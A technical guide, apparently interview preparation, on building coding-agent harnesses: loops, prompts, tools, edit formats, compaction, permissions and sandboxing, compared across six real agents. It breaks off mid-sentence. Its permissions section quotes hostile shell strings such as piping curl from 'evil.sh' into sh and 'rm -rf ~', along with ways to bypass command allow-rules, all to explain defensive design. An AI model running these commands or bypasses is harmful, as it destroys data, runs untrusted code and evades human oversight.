Harness Engineering
B7 covers using coding agents. This page covers building them: the loop, prompt assembly, tools, edits, context, permissions, sandboxing, persistence and extensions. Agent companies ask candidates to design one. Implementation claims link to real source (Codex CLI, OpenCode, Pi, Gemini CLI, Aider, mini-swe-agent). Claude Code is closed source and is described from official docs only.
Code facts were read from clones taken on 2026-10-02: Codex main @ a759874, OpenCode dev @ 1ddb087, Pi main @ 7fbbd5f, Gemini CLI main @ c9096a8 (a 0.64 nightly), Aider main @ 5dc9490 (May 2026), mini-swe-agent main @ 04d809c. These projects change weekly, and some well-known facts are already stale (Codex dropped its chat wire API and ghost-commit undo; OpenCode's TUI is no longer Go). Links point at branch heads, so files may move.
TL;DR: the 8–12 things to be able to say out loud
- Agent = model + harness. The same model scores differently in different harnesses.
- The loop is tiny (call, run tools, append, repeat). The engineering is everything around it.
- The prompt is assembled from base prompt, environment, memory files, tool schemas, skills index and reminders, ordered so the stable part is a cacheable prefix.
- Tool descriptions and error messages are prompts. Cap tool output (head+tail, or spill to file) and make errors say how to recover.
- Edit format depends on the model: exact unique replace (Claude Code; Pi adds normalization), fuzzy chains (OpenCode, Gemini), Codex's trained-on
apply_patch, Aider's SEARCH/REPLACE. OpenCode switches by model ID. - Compaction = trigger + cut point + summary prompt (Codex 90%, Pi window − 16k, Gemini 50%). Clear old tool output first.
- Permissions: (tool, args, mode, rules) → allow/ask/deny. Parse shell commands with tree-sitter-bash, because prefix matching is unsafe.
- The OS sandbox is a separate layer: Seatbelt, bubblewrap + seccomp, an egress proxy. Pi ships none, by design.
- Reliability is plumbing: jittered retries, loop detection, steering, shadow-git snapshots, JSONL logs, RwLock-guarded parallel tools.
- Multi-provider means normalizing messages, tool IDs, thinking blocks and cache markers, and tuning prompts and tools per model.
- Extensibility has converged: MCP, hooks, SKILL.md progressive disclosure, subagents-as-tools, headless JSONL + SDK, client/server cores.
- Evaluate harness changes with the model held fixed: k runs per arm, pass rate + cost + turns, read trajectories.
1. What a harness is, and why it matters
The harness (or scaffold) is the code that turns model output into actions and feeds results back. Anthropic: "An agent harness (or scaffold) is the system that enables a model to act as an agent", and "When we evaluate 'an agent,' we're evaluating the harness and the model working together." Anthropic 2026 General agent theory is in B4.
Evidence that the harness moves the score
- Anthropic, SWE-bench Verified (Jan 2025): Claude 3.5 Sonnet with a minimal two-tool scaffold (Bash plus an Edit tool) reached 49%. The post says agent performance "can vary significantly based on this scaffolding, even when using the same underlying AI model." Anthropic 2025
- OpenAI, GPT-4.1 prompting guide: three system-prompt reminders (persistence, tool-calling, planning) "increased our internal SWE-bench Verified score by close to 20%". Passing tools through the API's schema field instead of pasting them into the prompt gave about 2% more. OpenAI cookbook
- SWE-bench leaderboard: the Verified board lists the same model under several harnesses. Claude 4.5 Opus is listed at 79.2 with two third-party agents and 76.8 / 74.4 under mini-SWE-agent 2.0 / 1.16. (Reasoning effort also differs between rows.) The default "Bash Only" view fixes the harness to remove that variance. swebench.com
- Terminal-Bench: a third-party leaderboard for Terminal-Bench 2.1 shows one model at 83.1% in its vendor harness and 78% in the neutral Terminus 2 agent. Snorkel leaderboard The reference harness, Terminus, has a single tool (a tmux session) and is "designed without any particular language model in mind". tbench.ai
tbench.ai lists versions up to 4.0 (Aug 2026), and leaderboards change monthly. Re-check numbers before quoting them. Paper: arXiv:2601.11868.
What the harness is responsible for
- The loop: sampling, tool dispatch, stop conditions, retries, interrupts.
- Prompt assembly: system prompt, environment, memory files, tool schemas, reminders.
- The tool surface: which tools exist, how they are described, how output is shaped and truncated.
- Edit application: turning the model's edit intent into file changes, with matching, validation and diagnostics.
- Context management: budgeting, pruning, compaction, subagent isolation.
- Safety: the permission policy, the OS sandbox, network egress, secrets.
- State: session logs, resume and fork, snapshots and undo, cost accounting.
- Provider abstraction: wire formats, thinking blocks, caching, per-model tuning.
- Surfaces and extension: TUI, IDE, headless and SDK; MCP, hooks, skills, plugins, subagents.
"Why not just call the API in a loop?" The loop is 20 lines, and those 20 lines fail on real repos: context overflows, edits corrupt files, rm -rf runs unprompted, one 429 kills the session, nothing can be undone or resumed. Each responsibility above fixes one of those. Then cite a measured harness effect, such as GPT-4.1's ~20% gain from three reminders.
- Raising the bar on SWE-bench Verified: the minimal-scaffold design and the edit tool's exact-match rule.
- Demystifying evals for AI agents: harness + model as the unit under test.
- Terminal-Bench paper: task design and the Terminus reference agent.
2. Anatomy of a harness
Every harness has the same parts. How much each part does varies.
The parts, one line each, with a real example
| Component | Job | Real implementation to read |
|---|---|---|
| Turn loop | Sample, dispatch, decide whether to continue | Codex run_turn in core/src/session/turn.rs; Pi packages/agent/src/agent-loop.ts |
| Provider layer | One internal message model, many wire formats | Pi pi-ai; OpenCode provider/transform.ts |
| Prompt assembler | Build system + first-turn context | Pi system-prompt.ts; Gemini prompts/snippets.ts |
| Tool registry | Which tools, for which model, with which schema | OpenCode tool/registry.ts; Codex tools/spec_plan.rs |
| Context manager | Prune, compact, budget | Gemini chatCompressionService.ts; Pi core/compaction/ |
| Policy engine | allow / ask / deny | Codex core/src/exec_policy.rs; Gemini policy/policy-engine.ts |
| Sandbox | Contain what the shell can do | Codex sandboxing/ and linux-sandbox/ |
| Session store | Durable log, resume, fork | Codex rollout/ (JSONL); OpenCode SQLite (core/src/session/sql.ts) |
| Surfaces | Render events, collect input | Codex app-server/; Pi modes/rpc/ |
System prompt assembly
The system prompt is assembled from layers, most stable first:
- Base prompt. Identity, working style, tool-use rules. Often chosen per model. OpenCode's
provider()in session/system.ts picksanthropic.txtfor Claude models,gemini.txtforgemini-,codex.txtfor GPT Codex models,beast.txtfor gpt-4/o1/o3, anddefault.txtotherwise. Gemini composes named renderers (renderCoreMandates,renderSandbox…). - Tool definitions, in the API's tools field rather than prose.
- Memory / project instruction files. Codex walks from the git root down to the cwd, concatenating
AGENTS.override.mdorAGENTS.md, capped atproject_doc_max_bytes= 32 KiB (core/src/agents_md.rs). Pi checksAGENTS.override.md, AGENTS.md, CLAUDE.mdper directory from~/.pi/agentand every ancestor (resource-loader.ts). OpenCode takes the first ofAGENTS.md/CLAUDE.mdfound walking up. It also attaches nested AGENTS.md files just-in-time when the model reads a file under them (session/instruction.ts). Gemini loads GEMINI.md up to the.gitboundary (memoryDiscovery.ts). - Environment block. cwd, OS, shell, date, git status. Codex renders an
<environment_context>XML fragment (core/src/context/). Gemini CLI builds a<session_context>block in environmentContext.ts, with global memory in the system instruction, project memory in the first user message and subdirectory memory just-in-time. - Skills index. Only name + description + path. The body loads on demand (§10).
- Dynamic reminders. Mode changes, todo state, "file changed on disk". These are appended as messages, not edited into the system prompt, so the cached prefix survives. Pi goes further: when a prompt section changes, it sends the change as a transcript delta instead of a new system prompt (
diffSystemPromptSections).
Sort the layers by how often they change. Put a timestamp at the top of the system prompt and every call misses the cache.
- Codex turn.rs: a production turn loop with compaction, retries and tool dispatch in one file.
- Pi: how-pi-works.md: a short, honest description of a minimal harness.
- B1 on prompt caching and tool calling, which this layer relies on.
2b. The turn state machine
Codex's run_turn doc comment states the rule: execute any requested function call and send the output back; a reply with only an assistant message completes the turn. OpenCode's loop in session/prompt.ts exits when the finish reason is not tool-calls and nothing is pending. Gemini CLI adds a twist: when a turn ends with no tool calls, checkNextSpeaker asks a model whether the agent should keep going, and if so sends "Please continue."
Making "the model stopped calling tools" the only stop condition. You also need a step limit, a cost or time limit, loop detection, and a defined way to handle finish_reason = length, where output was cut off mid-tool-call. mini-swe-agent has a dedicated format-error template for exactly that case (config/default.yaml).
- mini-swe-agent agents/default.py: the whole state machine in about 190 lines, with control flow by exceptions.
- Gemini CLI core/client.ts:
processTurnshows everything that runs before sampling.
3. Teardown of the real harnesses
Below is architecture and philosophy for each harness. The table that follows covers the details. "Pi" means Mario Zechner's minimal coding agent. Its repo badlogic/pi-mono now redirects to earendil-works/pi, and the LICENSE still names him.
OpenAI Codex CLI
Written in Rust: a Cargo workspace of about 190 crates (codex-rs/). The npm package is just a launcher that picks a platform binary. The TUI uses ratatui. The design is client/server: an app-server speaks JSON-RPC (thread/start, thread/fork, thread/compact/start …) over stdio, websocket or a unix socket. Both the TUI and codex exec drive the core through an in-process client. Philosophy: co-designed with the model. Per-model metadata in models.json sets shell type, patch tool type, truncation policy and context window. The only wire API is OpenAI Responses.
OpenCode
Written in TypeScript on Bun, using Effect and the Vercel AI SDK (streamText in session/llm.ts). It is client/server too. An HTTP server (server/server.ts) holds the state. The TUI (OpenTUI + SolidJS, packages/tui) normally reaches it in-process through a Bun worker. opencode serve runs it headless, and the JS SDK is generated from its OpenAPI spec. Philosophy: provider-agnostic and hackable, with per-model prompts and tools, a plugin hook API, and agents and commands defined in markdown.
Pi
Written in TypeScript on Node as small libraries: pi-ai (unified LLM API), pi-agent-core (loop, events, steering), pi-tui (differential rendering) and pi-coding-agent. There are four default tools and a short sectioned system prompt (system-prompt.ts). It deliberately has no permission system or sandbox: the README says it "does not include a built-in permission system" and points to containerization.md. Plan mode, subagents and permission gates exist only as example extensions. MCP ships as a built-in extension you can disable. Philosophy: minimal core, extend it yourself.
Gemini CLI
Written in TypeScript on Node, with an Ink/React TUI (cli), a core package, an A2A server, an SDK and a VS Code companion. The loop is GeminiClient.processTurn → Turn.run, and tools run in an event-driven Scheduler. Safety is layered: a TOML policy engine, trusted folders, a whole-process sandbox and a per-command sandbox. It has the most defensive engineering of the group (loop detection, model fallback, verified compression; see §6 and §8). Philosophy: feature-rich and policy-heavy, built around Gemini.
Aider
Written in Python, and the oldest design here. It still doesn't use tool calling. The model writes edits as text, and a Coder subclass per format parses them (aider/coders/). The user picks which files are in the chat. A tree-sitter repo map summarizes the rest. It is git-native (auto-commit, /undo) and runs an optional lint/test loop. It suggests shell commands for the user to confirm. Philosophy: pair programmer, not autonomous agent, with per-model tuning in model-settings.yml. The last commit in the clone is from May 2026.
Claude Code (from official docs)
Ships as a native binary. The npm package installs the same binary, which "does not itself invoke Node". The implementation language is not documented. Anthropic docs Notable tool choices: TodoWrite is off by default in favor of task tools, and on macOS/Linux search runs through Bash with embedded bfs/ugrep rather than separate Glob/Grep tools. Anthropic docs The sandbox is built on the open-source sandbox-runtime and is opt-in. Anthropic docs The Claude Agent SDK "runs the Claude Code binary". Anthropic docs Philosophy: give the agent "a computer" and loop through gather context, act, verify. Anthropic 2025
Claude Code tools, hooks and model-dependent behaviors are taken from the docs as of Oct 2026 and change with most releases. Check tools-reference and hooks.
Comparison table
| Codex CLI | OpenCode | Pi | Gemini CLI | Aider | Claude Code | |
|---|---|---|---|---|---|---|
| Language / runtime | Rust (npm launcher) | TypeScript / Bun, Effect, AI SDK | TypeScript / Node | TypeScript / Node | Python | Native binary (language not documented) |
| Core tools | exec_command, apply_patch, update_plan, web_search, MCP, agents | bash, read, glob, grep, edit/write or apply_patch, task, todowrite, webfetch, skill | read, bash, edit, write (+ opt-in grep/find/ls) | read_file, replace, write_file, glob, grep_search, run_shell_command, web_fetch, write_todos, invoke_agent | none (text edit formats) | Read, Edit, Write, Bash, Agent, WebFetch, Skill, Task*, … |
| Edit format | apply_patch (Lark grammar, freeform) | Replacer chain; apply_patch for GPT | Multi-edit exact + normalized match | Exact → flexible → regex → fuzzy; optional LLM fixer | SEARCH/REPLACE, whole, udiff, patch (per model) | Exact unique string replace |
| Sandbox | Seatbelt / bwrap+seccomp / Win token; on by default | None | None (containers recommended) | Docker/Podman/Seatbelt/gVisor + per-command bwrap/Seatbelt | None | Seatbelt / bwrap; opt-in |
| Permissions | approval policy × sandbox mode; Starlark rules | allow/ask/deny wildcards; per-agent | None (example extension) | TOML policy engine, 4 approval modes | Confirm prompts | Modes + allow/ask/deny rules + hooks |
| Compaction | at min(config, 90% window); local or remote | overflow buffer 20k; opt-in tool-output pruning | window − 16,384; keep 20k recent | at 50%, keep last 30%; tool-output masking | Summarize history (weak model) | Clear old tool output, then summarize |
| Undo | None for files (thread/revert = history only) | Shadow git snapshots | Session tree (/tree, /fork) | Shadow git checkpoints (opt-in) | git commits + /undo | Checkpoints + /rewind |
| Extensibility | MCP, hooks, skills, plugins, SDK (TS/Py) | MCP, plugins, custom tools, md agents/commands, skills, SDK | TS extensions, skills, prompt templates, packages, SDK | MCP, extensions, hooks, skills, md agents, TOML commands, SDK | Scripting API; few hooks | MCP, hooks, skills, plugins, subagents, Agent SDK |
| Philosophy | Co-designed with OpenAI models | Model-agnostic, hackable | Minimal core | Feature-rich, policy-heavy | Human-driven pair programming | Give the model a computer |
"Compare two coding agents." Compare design axes, not features: one model vs model-agnostic; sandbox vs approvals vs containers; monolith vs client/server; rich core vs minimal core plus extensions. Back each with a code-level example.
- Pi coding-agent README: the clearest statement of the minimalist position.
- Codex app-server: what a harness looks like when the UI is just a client.
- OpenCode tool/registry.ts: per-model tool selection in a few lines.
4. Tool design in depth
Tool-calling mechanics are in B1. This section covers which tools to expose and how to shape them.
The core tool set
| Tool | Why it's separate from bash, with notes from real code |
|---|---|
| read | Line numbers, pagination, image support, and a record that "the model has seen this file". Pi and OpenCode cap a read at 2,000 lines / 50 KB with offset/limit (tool/read.ts). |
| edit / write | Validated, reviewable diffs that can be snapshotted for undo (§5). |
| grep / glob | Fast, gitignore-aware, bounded output. Claude Code now runs search through Bash on macOS/Linux instead. |
| bash | Everything else: tests, git, package managers, gh. Design choices: timeout, PTY or not, persistent vs fresh shell, output cap. |
| web fetch / search | Docs lookup. The biggest prompt-injection risk of any tool (§7). |
| todo / plan | Working memory outside the context, shown in the UI: Codex update_plan, Gemini write_todos, OpenCode todowrite. |
| task / subagent | Context isolation: OpenCode task, Gemini invoke_agent, Claude Code Agent. |
Descriptions and schemas are prompt engineering
The model knows a tool only through its name, description and schema. Anthropic's guide recommends namespacing, returning "only high signal information", and iterating on tools with evals. Anthropic 2025 Patterns in the repos:
- Descriptions as files. OpenCode keeps each description in a
.txtnext to the tool (edit.txt), so wording changes don't touch code. Pi's read description says "Use offset/limit for large files", a behavioral nudge rather than documentation. - Accepting the model's mistakes. Pi's edit tool accepts
editssent as a JSON string, because some models send that (tools/edit.ts). OpenCode'sexperimental_repairToolCalllowercases misspelled tool names and sends anything else to aninvalidtool that explains the error. - Freeform tools. Codex's
apply_patchtakes raw text constrained by a Lark grammar, not JSON, so the patch needs no escaping.
Output truncation and pagination
One npm install log can fill the window. Harnesses differ in where they cut and what they keep:
| Harness | Cap | Strategy |
|---|---|---|
| Codex | 10,000 tokens per call (per-model truncation_policy) | Head + tail, middle cut with a "…N tokens truncated…" marker and a warning prefix (utils/output-truncation) |
| OpenCode | 2,000 lines / 50 KB (configurable tool_output.max_lines/max_bytes) | Full output saved to disk. The result says where, and suggests delegating to the explore agent (tool/truncate.ts) |
| Pi | 2,000 lines / 50 KB | read keeps the head. bash keeps the tail and saves the full output to a temp file (tools/truncate.ts) |
| Gemini CLI | 40,000 chars, shrinking as the context fills | min(4 × remaining tokens, threshold). Saved to a file, applied to shell and MCP text output (scheduler/tool-executor.ts) |
| mini-swe-agent | 10,000 chars | First and last 5,000, plus an elided_chars count and an "Output too long." warning (config/mini.yaml) |
For commands keep the tail, where errors are. For files keep the head, where imports and definitions are. "Save to file, return the path" gives you both and loses nothing.
Errors that help the model recover
An error message is the prompt for the next step. Real examples:
# Pi (edit-diff.ts)
Found 3 occurrences of the text in src/app.ts. The text must be unique.
Please provide more context to make it unique.
# OpenCode (tool/edit.ts)
Could not find oldString in the file. It must match exactly, including
whitespace, indentation, and line endings.
# Aider (editblock_coder.py), abridged
## SearchReplaceNoExactMatch: This SEARCH block failed to exactly match lines in foo.py
Did you mean to match some of these actual lines from foo.py?
...
# The other 2 SEARCH/REPLACE blocks were applied successfully.
Don't re-send them.
Aider's is the most helpful. It shows the closest real lines, says which blocks already applied, and is sent back as a "reflection" up to max_reflections = 3 times (base_coder.py).
Guards: read-before-edit and friends
- Read-before-edit: Claude Code requires a prior read for older models, so the model can't edit from an imagined version of the file. Anthropic docs The OpenCode snapshot I read has no such guard. It relies on exact matching plus a per-file lock.
- Stale-file check: Gemini CLI re-hashes the file before running its LLM edit fixer.
- Over-broad match guard: OpenCode's
isDisproportionateMatchrejects fuzzy matches much larger thanoldString. - Post-edit diagnostics: OpenCode appends formatter and LSP diagnostics to the edit result.
Bash-only vs a rich tool set
Bash-only (mini-swe-agent, Terminus)
One bash tool. Each command runs in a fresh subprocess, with no persistent shell (its FAQ explains why: it's hard to detect when a command finishes, and a session can die). The task ends with echo COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT. swebench.com reported it at 65% on Verified "in 100 lines of Python". Pros: linear history, trivially sandboxed, easy to train on. Cons: sed/heredoc edits are error-prone; no per-tool permissions or diffs.
Rich tool set (Claude Code, Gemini CLI, OpenCode)
Dedicated tools let the harness validate edits, snapshot files, show diffs, set per-tool permissions, page output and track reads. Cons: every schema costs context on every call, and more tools mean more wrong choices. Pi's four default tools sit in between.
The agent-computer interface (ACI)
The SWE-agent paper (arXiv 2405.15793, "Agent-Computer Interfaces Enable Automated Software Engineering") argued that LMs need interfaces designed for them: a windowed file viewer, capped search output, an editor that lints and rejects broken edits. The same team's mini-swe-agent README now says "as LMs have become more capable, a lot of this is not needed". The ACI ideas survive as tool behavior (output caps, actionable errors, diagnostics) rather than special commands.
"Dedicated grep tool or just bash?" Bash-only is simpler and works with strong models. Dedicated tools earn their place when the harness needs control: per-tool permissions, bounded output, read tracking, undo. Note that Claude Code moved search back into Bash. The trend is toward fewer, more powerful tools.
- Writing effective tools for agents: response shaping, namespacing, eval-driven tool iteration.
- mini-swe-agent FAQ: the case against persistent shells.
- SWE-agent paper: the original ACI argument and ablations.
5. Edit formats in depth
B7 summarizes the formats. This section covers how harnesses apply edits, and how edits fail.
The five families
| Format | What the model emits | Who uses it | Main failure mode |
|---|---|---|---|
| Whole file | The complete new file | Aider whole; any write tool | Token cost; "lazy" elisions like # ... rest unchanged; dropped code |
| Search/replace blocks | <<<<<<< SEARCH … ======= … >>>>>>> REPLACE in plain text | Aider diff, diff-fenced | SEARCH text drifts from the file (whitespace, hallucinated lines) |
| Unified diff | --- / +++ / @@ hunks | Aider udiff | Wrong line numbers and hunk counts; skipped context lines |
| Patch DSL | *** Begin Patch envelope with file-level ops and context hunks | Codex apply_patch; OpenCode apply_patch for GPT; Aider patch | Models not trained on it; context anchors that don't match |
| String-replace tool | JSON {path, old, new} (Pi: an array of edits) | Claude Code, Pi, Gemini CLI, OpenCode edit | Non-unique or non-matching old; many calls for sweeping changes |
Codex's apply_patch, read from the grammar
This is the Lark grammar Codex sends as the tool's format constraint, verbatim from core/assets/tools/apply_patch.lark:
start: begin_patch hunk+ end_patch
begin_patch: "*** Begin Patch" LF
end_patch: "*** End Patch" LF?
hunk: add_hunk | delete_hunk | update_hunk
add_hunk: "*** Add File: " filename LF add_line+
delete_hunk: "*** Delete File: " filename LF
update_hunk: "*** Update File: " filename LF change_move? change?
filename: /(.+)/
add_line: "+" /(.*)/ LF -> line
change_move: "*** Move to: " filename LF
change: (change_context | change_line)+ eof_line?
change_context: ("@@" | "@@ " /(.+)/) LF
change_line: ("+" | "-" | " ") /(.*)/ LF
eof_line: "*** End of File" LF
An example patch (mine, not from the repo):
*** Begin Patch
*** Update File: src/server.py
@@ def handle(req):
- return render(req)
+ if req.user is None:
+ return redirect("/login")
+ return render(req)
*** Add File: tests/test_auth.py
+def test_redirects_anonymous(client):
+ assert client.get("/").status_code == 302
*** End Patch
There are no line numbers, which are the main thing models get wrong in unified diffs. Hunks are located by context lines, optionally narrowed by an @@ scope anchor. Add, delete and move operations share one envelope. seek_sequence() matches with decreasing strictness: exact, then ignoring trailing whitespace, then ignoring whitespace at both ends, then normalizing Unicode punctuation. OpenAI's guide: "We strongly recommend using our exact apply_patch implementation as the model has been trained to excel at this diff format." OpenAI cookbook
String replace with uniqueness, and the fuzzy fallbacks
Anthropic's 2025 SWE-bench scaffold set the rule: "The replacement will only occur if there is exactly one match." Anthropic 2025 If old appears twice, the model has usually misjudged where it is. Harnesses differ in how much fuzziness they allow after an exact match fails:
| Harness | Fallback chain (in order) |
|---|---|
| Claude Code | None. Exact match only; "doesn't use regex or fuzzy matching". docs |
| Pi | Exact → normalized (NFKC, trailing whitespace trimmed, smart quotes/dashes/odd spaces mapped to ASCII). Uniqueness is counted in normalized text. Multiple non-overlapping edits per call (edit-diff.ts). |
| OpenCode | Nine replacers: SimpleReplacer → LineTrimmedReplacer → BlockAnchorReplacer → WhitespaceNormalizedReplacer → IndentationFlexibleReplacer → EscapeNormalizedReplacer → TrimmedBoundaryReplacer → ContextAwareReplacer → MultiOccurrenceReplacer. Each candidate must be unique (tool/edit.ts). |
| Gemini CLI | Exact → flexible (whitespace) → regex → fuzzy. Then an optional LLM fixer (llm-edit-fixer.ts) that rewrites a failed search/replace. It is off by default (tools.disableLLMCorrection defaults to true). |
| Aider | Exact on lines → missing leading whitespace → drop a spurious leading blank line → ... elision expansion → try the other files in the chat. An edit-distance matcher (replace_closest_edit_distance) exists in the code but is unreachable behind an early return (editblock_coder.py). |
Assuming more fuzziness is better. A fuzzy match on the wrong occurrence corrupts code silently, which is worse than a loud, retryable failure. Fall back only to meaning-preserving normalizations (whitespace, Unicode punctuation). Otherwise fail with a helpful error.
Models are trained on formats
Format quality depends on the model, partly as a training artifact:
- OpenCode switches tool sets by model ID (registry.ts):
const usePatch = input.modelID.includes("gpt-") && !input.modelID.includes("oss") && !input.modelID.includes("gpt-4") if (tool.id === ApplyPatchTool.id) return usePatch if (tool.id === EditTool.id || tool.id === WriteTool.id) return !usePatch - Aider sets
edit_formatper model in model-settings.yml. For example,gpt-4-1106-previewgetsudiffplus alazyflag that appends "You NEVER leave comments describing code without implementing it!"
Aider's unified-diff experiment is the best-documented edit-format benchmark. On an 89-task Python refactoring "laziness" suite, GPT-4 Turbo (gpt-4-1106-preview) scored 20% with SEARCH/REPLACE blocks and 61% with Aider's unified diff format, which "reduced laziness by 3X". Aider docs Aider's udiff isn't strict GNU diff. It ignores line numbers and applies hunks with flexible strategies (search_replace.py).
Aider's four principles for edit formats: FAMILIAR (like pre-training data), SIMPLE (little escaping), HIGH LEVEL (whole functions, not minimal hunks), FLEXIBLE (forgive cosmetic drift). Codex adds a fifth: trained on.
The usual follow-up is "which would you pick?" The answer is to measure it: A/B the formats on your own eval suite, with the model held fixed, and expect the winner to change by model family.
- Aider edit-formats doc and unified-diffs doc.
- Codex apply-patch crate: parser, streaming parser,
seek_sequence. - Anthropic text editor tool: the API-level
str_replacecontract (view,str_replace,create,insert).
6. Context engineering inside the harness
Concepts are in B3 and B1. This section covers what the harness does with the window, turn by turn.
What's in the window at turn N
cacheControl: ephemeral (provider/transform.ts).Cache-friendly ordering
Never change the prefix: base prompt and tools come first, and tools are never reordered. Lazy MCP loading through a tool-search tool (Claude Code ToolSearch, Codex tool_search) keeps many schemas out of it. History is append-only, and state changes arrive as new messages. Compaction deliberately resets the cache, so run it rarely and only at a turn boundary.
Compaction: trigger, cut point, summary prompt
Each implementation decides when to compact, what to keep verbatim, and what the summary must contain.
| Harness | Trigger | Kept verbatim | Summary prompt asks for |
|---|---|---|---|
| Codex | min(model_auto_compact_token_limit, 90% of window) (openai_models.rs) | Initial context plus recent user messages up to 20k tokens (compact.rs). It can also compact server-side. | "CONTEXT CHECKPOINT COMPACTION … handoff summary for another LLM" (prompt.md) |
| Pi | contextTokens > contextWindow − reserveTokens (16,384) | ~20,000 recent tokens; never cuts at a tool result | Goal / Constraints / Progress / Decisions / Next Steps / Critical Context (docs/compaction.md) |
| Gemini CLI | 50% of the window (model.compressionThreshold) | The last 30% of history | An XML <state_snapshot>, then a "probe" call that checks it for omissions (chatCompressionService.ts) |
| OpenCode | Tokens ≥ usable input minus a 20,000 buffer (overflow.ts) | Opt-in pruning first: tool output older than the last 40k tokens becomes "[Old tool result content cleared]" | Objective / Details / Work State / Next Move / Files (core/src/session/compaction.ts) |
| Claude Code | Near the limit (default threshold not documented) | Clears old tool outputs, then summarizes; re-reads CLAUDE.md | Steerable via CLAUDE.md or /compact focus on … docs |
| Aider | History exceeds max_chat_history_tokens (window/16, clamped 1k–8k) | A recent tail under half the budget | Recursive summarization of the head by the weak model (history.py) |
Summaries that lose constraints: "don't touch migrations" at turn 3, and the agent edits migrations after compaction. Good templates have an explicit constraints slot. Also watch for thrashing, where compaction frees too little and repeats. Claude Code "stops auto-compacting after a few attempts".
Tool-result clearing
Old tool outputs are the cheapest thing to drop, since the tool can be re-run. Gemini's toolOutputMaskingService.ts masks outputs beyond a 50k-token protection window, but only when at least 30k tokens can be reclaimed. Anthropic's API offers this server-side (clear_tool_uses_20250919). Anthropic API docs
Repo maps vs agentic search vs embeddings
Aider's repo map (repomap.py) is the most sophisticated static approach:
- Extract definition and reference tags with tree-sitter queries (
*-tags.scm). - Build a
networkx.MultiDiGraph: file A → file B when A references an identifier B defines. Weights: √(reference count), ×10 for mentioned identifiers, ×50 from chat files, ×0.1 for private or very common names. - Run
nx.pagerankpersonalized toward chat files and mentioned names, so it ranks relevance to the current task. - Binary-search how many definitions fit the budget (effectively window/8, clamped to 1k–4k tokens) and render an outline.
The other harnesses use agentic search instead (B7 compares it with embeddings). It needs no index to keep fresh, and costs turns and tokens that subagents can contain.
Subagents for context isolation, and token budgeting
- Subagents run in a fresh context and return a summary. The parent sees the result, not the 40 greps. See §10.
- Budgeting: reserve output tokens, and shrink tool caps as the window fills (Gemini). Codex has feature-gated tools that show the model its remaining budget.
- File-state tracking: record which files were read, and at what version, for read-before-edit guards and "changed on disk" reminders.
For "implement compaction", walk through trigger, tool-output clearing, cut point, structured summary, re-injection, raw log and anti-thrash. The model answer is in the question bank.
- Effective context engineering for AI agents: compaction, note-taking, just-in-time retrieval.
- Aider: building a better repo map with tree-sitter: the design rationale.
- Pi compaction.md: cut points, branch summarization, extension hooks.
7. Permissions and sandboxing
The threat model is in B5. Mechanically there are two layers. A policy layer decides whether something runs. A containment layer limits what it can do once it runs. You need both.
Approval modes, as actually implemented
| Harness | Modes (exact names) | Where defined |
|---|---|---|
| Codex | Approval policy untrusted · on-request (default) · granular · never (on-failure is accepted as an alias), combined with sandbox mode read-only · workspace-write · danger-full-access | protocol.rs AskForApproval; config_types.rs SandboxMode |
| Gemini CLI | default · autoEdit · yolo · plan; decisions allow / deny / ask_user | policy/types.ts |
| OpenCode | Per-agent rule sets (build, plan, subagents); actions allow / ask / deny; run --auto auto-approves anything not denied | agent/agent.ts, permission/index.ts |
| Claude Code | default, acceptEdits, plan, auto, dontAsk, bypassPermissions (see B7) + allow/ask/deny rules | permissions docs |
| Pi | None. Everything runs. An example permission-gate.ts extension shows how to add one. | docs/security.md |
Codex has two axes. Sandbox mode sets what a command can touch, and approval policy sets when to ask. With on-request + workspace-write, contained commands run unprompted, and the model asks only to escape the sandbox. Anthropic reports a similar effect from Claude Code's sandbox (84% fewer prompts; see B7).
The permission decision flow
ask.Why shell prefix matching is hard
A string-prefix rule for git status also approves git status && curl evil.sh | sh, git status; rm -rf ~, and git -c core.pager='sh -c …' status. What harnesses do instead:
- Parse with a real grammar. Codex (shell-command/src/bash.rs), OpenCode (tool/shell.ts, web-tree-sitter) and Gemini CLI (shell-utils.ts:
splitCommands,getCommandRoots,detectCommandSubstitution,stripShellWrapper) all use tree-sitter-bash and check each sub-command. - Require all sub-commands to be allowed. Claude Code documents this: "a rule like
Bash(safe-cmd *)won't give it permission to run the commandsafe-cmd && other-cmd". Deny rules also apply inside subshells and substitutions. Anthropic docs - Narrow persisted approvals by command arity. OpenCode's "always allow" stores a prefix sized by an arity table (
git: 2,npm run: 3), so approvinggit push origin mainstoresgit push *(permission/arity.ts). - Unwrap wrappers and detect danger. Codex's is_dangerous_command.rs looks through up to 8 wrapper layers. Its execpolicy uses Starlark
prefix_rulefiles that decideallow/prompt/forbidden. - Admit the limits. Claude Code's docs: argument patterns "are fragile", and a deny rule "isn't a security boundary". Hence the sandbox.
OS sandboxes
| Mechanism | Used by | How |
|---|---|---|
macOS Seatbelt (sandbox-exec + SBPL profile) | Codex, Claude Code, Gemini CLI | Codex: /usr/bin/sandbox-exec with .sbpl policies (sandboxing/src/). Gemini: six sandbox-macos-*.sb profiles (cli/src/utils/). |
| bubblewrap (user namespaces, bind mounts) | Codex, Claude Code, Gemini CLI (per-command) | Codex applies "no_new_privs + seccomp" in-process and "bubblewrap for filesystem isolation" (linux-sandbox). Landlock is a legacy fallback. |
| seccomp | Codex | Syscall filter used to block network sockets |
| Containers / gVisor / microVMs | Gemini CLI (Docker, Podman, runsc), Pi (recommended: Docker, OpenShell, Gondolin QEMU microVM), mini-swe-agent (Docker per task) | Whole-process isolation: strongest, but heavier |
Network egress, secrets, injection
- Egress: Codex's
workspace-writedefaults tonetwork_access = false, and its network-proxy enforces host policy. Claude Code proxies sandboxed traffic against a domain allowlist that starts empty. - Secrets: Claude Code's sandbox still allows reads of "credential files such as
~/.ssh" unless you deny them. Gemini treats.env*asSECRET_FILES(sandboxManager.ts). OpenCode asks before reading*.env. - Injection via repo content: mitigations seen in code include trust gates (Gemini's trusted folders, Pi's project trust), a "CRITICAL SECURITY RULE" in Gemini's compression prompt, and injection evals (
prompt_injection_mcp).
Interviewers often follow "design shell permissions" with "how would someone bypass it?" Have examples ready: indirection through a script the agent writes, git -c config injection, and env-var expansion. Each is a reason the sandbox must contain whatever slips past the policy.
- Claude Code sandboxing docs and sandbox-runtime: a reusable open-source sandbox.
- Codex linux-sandbox: bwrap + seccomp in practice.
- Gemini CLI built-in policy TOMLs: a readable policy-as-data example.
8. Reliability and the loop
Mostly plumbing. Durable execution in general is in B4.
Stop conditions and loop detection
- Step limits. On the final step OpenCode injects
